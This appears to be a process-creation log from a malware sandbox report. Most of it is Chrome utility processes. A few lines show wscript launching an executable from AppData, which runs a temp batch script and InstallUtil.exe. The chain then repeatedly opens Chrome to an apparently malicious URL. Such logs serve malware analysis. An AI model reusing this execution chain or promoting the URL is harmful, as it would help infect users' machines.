Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1916,i,2743930979166446243,11984125679060302953,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2004,i,12612036452984945250,3418118297406578597,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1896,i,12903140965514512258,7879093714222373490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2020,i,5642825108350335219,8833507162415557396,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,14015565629516230816,9755923701176644948,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,10036202946459383482,9416271039885435074,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1584,i,5243679326072088091,3788876514745600771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,10283285120756280865,5244641420518172917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,10757545353850069080,17528760924176413797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,5668110240625218180,2372566740740461637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1996,i,10628045244502770481,15461531275763280924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1988,i,1396496370233068950,16639235529074936853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=600 --field-trial-handle=1952,i,5853220489963610329,11725451507788123041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,4294371869201058628,10846258970923498441,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1876,i,8933970381661588511,1818581820197100254,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=2004,i,13216114064629241855,13841717341427345233,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1980,i,10389912691377095377,17096823969531010843,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1888,i,4051071628513783081,16709262364601523388,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1964,i,15873263108661751163,18258898578722931507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,6147241270899392023,4453104157303319847,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1952,i,7341651988098688960,14787193282515593003,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2000,i,4938578974072308078,5824721121082526347,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\TypeId.exe "C:\Users\user\AppData\Roaming\TypeId.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1964,i,17019434423062336247,7506196191360105004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "
Source: C:\Users\user\AppData\Roaming\TypeId.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1980,i,4588146245341811016,13786467013321908988,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1032 --field-trial-handle=1972,i,17637373075668188386,10376262394289011974,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1472,i,3006803207684737282,13482510552465898190,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1992,i,7370493582738384417,3969430867986938643,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1952,i,8612513622396932950,13356658119274073296,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=2004,i,12612036452984945250,3418118297406578597,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1984,i,14226800829201652385,10276475017906767513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
